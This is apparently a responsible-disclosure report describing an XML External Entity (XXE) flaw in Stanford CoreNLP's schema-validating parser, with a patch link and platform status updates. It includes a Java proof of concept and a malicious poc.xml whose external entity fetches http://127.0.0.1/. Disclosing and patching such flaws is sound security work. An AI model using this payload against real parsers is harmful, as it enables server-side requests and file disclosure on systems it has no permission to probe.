Improper Restriction of XML External Entity Reference in stanfordnlp/corenlp
Valid
Reported on
Jan 15th 2022
Description
When a malicious schema XML file is passed to getValidatingXmlParser(), the parser is vulnerable to XXE when the SchemaFactory parses the schema XML file.
public static DocumentBuilder getValidatingXmlParser(File schemaFile) {
...
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(schemaFile);
SchemaFactory is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE when it creates a new schema from a schemaFile.
Proof of Concept
By default, SchemaFactory is vulnerable to XXE as shown by the example below:
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Schema;
import javax.xml.XMLConstants;
import java.io.File;
public class Poc {
public static void main(String[] args) {
try {
SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
Schema schema = factory.newSchema(new File("poc.xml"));
} catch (Exception e) {
e.printStackTrace();
}
}
}
poc.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1/">]>
<foo>&xxe;</foo>
Patch
https://github.com/stanfordnlp/corenlp/compare/HEAD...haxatron:fix-xxe-2
Impact
This vulnerability is capable of XXE when a developer uses this function to validate XML files against malicious schema files
We are processing your report and will contact the
stanfordnlp/corenlp
team within 24 hours.
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
We have contacted a member of the
stanfordnlp/corenlp
team and are waiting to hear back
a year ago
to join this conversation